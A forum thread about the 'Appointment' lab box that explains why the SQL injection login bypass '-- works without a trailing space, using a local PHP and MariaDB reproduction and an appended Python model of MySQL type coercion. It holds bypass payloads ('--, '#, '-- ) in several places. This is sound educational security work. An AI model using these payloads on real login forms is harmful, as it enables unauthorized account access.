Startingpoint APPOINTMENT SQL query

Hi all,

so I have done the Starting Point box “Appointment” and got a successful SQL injection, but I do not understand why the query actually works, as to my understanding it should not. I'm searching for an explanation, as I would like to understand it.

In the walkthrough.pdf the query is shown to be:
SELECT * FROM users WHERE username='username' AND password='password'

I have entered
username: '--
password: '--

It seems to be a MySQL database since the walkthrough states that # is the character for comments and, based on the SQL injection cheat sheet | Web Security Academy, only MySQL has that. So my input does not comment out anything and therefore should not work (as long as there is no empty user, but I confirmed that there isn't with other inputs).

Does someone understand why my input works and gives me the flag?


If you look closer, you’ll notice that MySQL has more than one way to comment and so
'#
or
'-- (mind the space here, it tripped me up)
will both work to cut the password check part of the clause off.

Hey,
thank you for your response.
I understand that there are multiple ways to comment in MySQL and, as you also emphasized in your reply, in MySQL the
'--(space)
only works as a comment when it is trailed by a space. That's exactly my problem. It works for me even when just entering
'--
without a trailing space for username and password. But only if I enter it for both parameters at the same time. That's what I do not understand. Why do I manage to log in providing these without spaces?

First off, I stand corrected.

So I ran a test, here's an excerpt of the PHP code they claim is running:

┌──(joel㉿framework-win)-[~]
└─$ cat appointment.php 
<?php 
$username="'--";
$password="'--";

$sql="SELECT * FROM users WHERE username='$username' AND password='$password'";

echo $sql;

┌──(joel㉿framework-win)-[~]
└─$ php -f ./appointment.php 
SELECT * FROM users WHERE username=''--' AND password=''--'

I created a table:

MariaDB [joel]> create table users (username varchar(255), password varchar(255));
Query OK, 0 rows affected (0.018 sec)

MariaDB [joel]> insert into users values ('admin', 'foobar');
Query OK, 1 row affected (0.002 sec)

And the output:

MariaDB [joel]> SELECT * FROM users WHERE username=''--' AND password=''--'
    -> ;
+----------+----------+
| username | password |
+----------+----------+
| admin    | foobar   |
+----------+----------+

Wait, wtf?

EDIT:

I think this has to have something to do with it.

MariaDB [joel]> SELECT * FROM users WHERE username=''--'';
+----------+----------+
| username | password |
+----------+----------+
| admin    | foobar   |
+----------+----------+
1 row in set, 3 warnings (0.000 sec)

MariaDB [joel]> show warnings;
+---------+------+-------------------------------------------+
| Level   | Code | Message                                   |
+---------+------+-------------------------------------------+
| Warning | 1292 | Truncated incorrect DOUBLE value: 'admin' |
| Warning | 1292 | Truncated incorrect DOUBLE value: ''      |
| Warning | 1292 | Truncated incorrect DOUBLE value: ''      |
+---------+------+-------------------------------------------+
3 rows in set (0.000 sec)
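The `SHOW WARNINGS` output above is the whole answer: without whitespace after `--`, MySQL does not see a comment but two minus operators, so the WHERE clause turns into arithmetic (`'' - -' AND password=''--'`), and a string compared with a number is implicitly cast to DOUBLE, with non-numeric strings becoming 0 and raising warning 1292. `'admin' = 0` is therefore true for every row, and the `password` column is never consulted at all. The following Python model was written for this edit (it is not code from the thread, from the box, or from MySQL itself) and imitates just enough of MySQL's lexer and type coercion to reproduce the three query variants discussed here. It also goes slightly beyond the thread by showing that a user whose name has a numeric prefix (e.g. `7`) would not be matched, and by contrasting the string concatenation with what a bound parameter does. Everything about the grammar and the coercion rule is a simplification and should be read as an assumption about the server's behaviour, not as its source.

```python
import re

# Constructed model of a tiny MySQL/MariaDB subset: string literals, '#' and '-- ' comments,
# unary/binary minus, '=' and AND. Assumption: it mirrors MySQL's rules for these tokens only.
TOKEN_RE = re.compile(r"""
    (?P<ws>\s+)
  | (?P<comment>\#[^\n]*|--(?:\s[^\n]*|$))   # '#...' or '-- ...': MySQL needs whitespace after '--'
  | (?P<str>'(?:[^']|'')*')                  # two quotes inside a literal are one escaped quote
  | (?P<num>\d+(?:\.\d+)?)
  | (?P<ident>[A-Za-z_]\w*)
  | (?P<op>=|-|\+)
""", re.VERBOSE)

# Leading numeric prefix that MySQL keeps when casting a string to DOUBLE.
_NUM_PREFIX = re.compile(r"\s*[-+]?(?:\d+\.?\d*|\.\d+)(?:[eE][-+]?\d+)?")


def tokenize(sql):
    """Split a WHERE clause into (kind, text) tokens, dropping whitespace and comments."""
    tokens, pos = [], 0
    while pos < len(sql):
        m = TOKEN_RE.match(sql, pos)
        if not m:
            raise ValueError(f"cannot tokenize at {sql[pos:]!r}")
        if m.lastgroup not in ("ws", "comment"):
            tokens.append((m.lastgroup, m.group()))
        pos = m.end()
    return tokens


def to_double(value, warnings):
    """MySQL-style implicit cast: keep the numeric prefix, warn about the rest, else 0."""
    if not isinstance(value, str):
        return float(value)
    m = _NUM_PREFIX.match(value)
    if m is None or m.end() != len(value):
        warnings.append(f"Truncated incorrect DOUBLE value: '{value}'")   # the 1292 warning
    return float(m.group()) if m else 0.0


class Parser:
    """Recursive-descent evaluator of the WHERE subset against one row (a dict)."""

    def __init__(self, tokens, row):
        self.toks, self.i, self.row, self.warnings = tokens, 0, row, []

    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else (None, None)

    def advance(self):
        tok = self.peek()
        self.i += 1
        return tok

    def where(self):                      # predicate := comparison (AND comparison)*
        result = bool(self.comparison())
        while self.peek()[1] is not None and self.peek()[1].upper() == "AND":
            self.advance()
            result = bool(self.comparison()) and result
        return result

    def comparison(self):                 # comparison := additive ('=' additive)?
        left = self.additive()
        if self.peek() == ("op", "="):
            self.advance()
            right = self.additive()
            if isinstance(left, str) and isinstance(right, str):
                return left == right      # string vs string: plain string compare
            return to_double(left, self.warnings) == to_double(right, self.warnings)
        return left

    def additive(self):                   # additive := term (('-'|'+') term)*
        value = self.term()
        while self.peek()[1] in ("-", "+"):
            op, rhs = self.advance()[1], self.term()
            a, b = to_double(value, self.warnings), to_double(rhs, self.warnings)
            value = a - b if op == "-" else a + b
        return value

    def term(self):                       # term := '-' term | atom   (unary minus coerces)
        if self.peek() == ("op", "-"):
            self.advance()
            return -to_double(self.term(), self.warnings)
        kind, text = self.advance()
        if kind == "str":
            return text[1:-1].replace("''", "'")
        if kind == "num":
            return float(text)
        if kind == "ident":
            return self.row[text]
        raise ValueError(f"unexpected token {text!r}")


def build_where(username, password):
    """The vulnerable concatenation from the thread's appointment.php, mirrored in Python."""
    return f"username='{username}' AND password='{password}'"


def evaluate_where(where_sql, row):
    """Return (matches, warnings) for one row, like the thread's SELECT plus SHOW WARNINGS."""
    parser = Parser(tokenize(where_sql), row)
    matched = parser.where()
    if parser.i != len(parser.toks):
        raise ValueError(f"trailing tokens: {parser.toks[parser.i:]}")
    return matched, parser.warnings


def login_parameterized(username, password, row):
    """What a prepared statement does instead: the input is data, so this is a string compare."""
    return row["username"] == username and row["password"] == password


# Constructed sample rows: the thread's admin/foobar plus a user whose name has a numeric prefix.
ADMIN = {"username": "admin", "password": "foobar"}
SEVEN = {"username": "7", "password": "x"}

if __name__ == "__main__":
    for payload in ("'--", "'-- ", "'#"):
        where = build_where(payload, payload)
        print(f"{where!r:45} tokens={[t for _, t in tokenize(where)]}")
        print("   admin:", evaluate_where(where, ADMIN), "  user 7:", evaluate_where(where, SEVEN))
```

Run it and the first line shows the `'--` payload lexed into `''`, `-`, `-` and one long string literal, with `admin` matching and three 1292 warnings, exactly what MariaDB printed in the post above; the `'-- ` and `'#` payloads really do strip the password check, but then only an empty username would match.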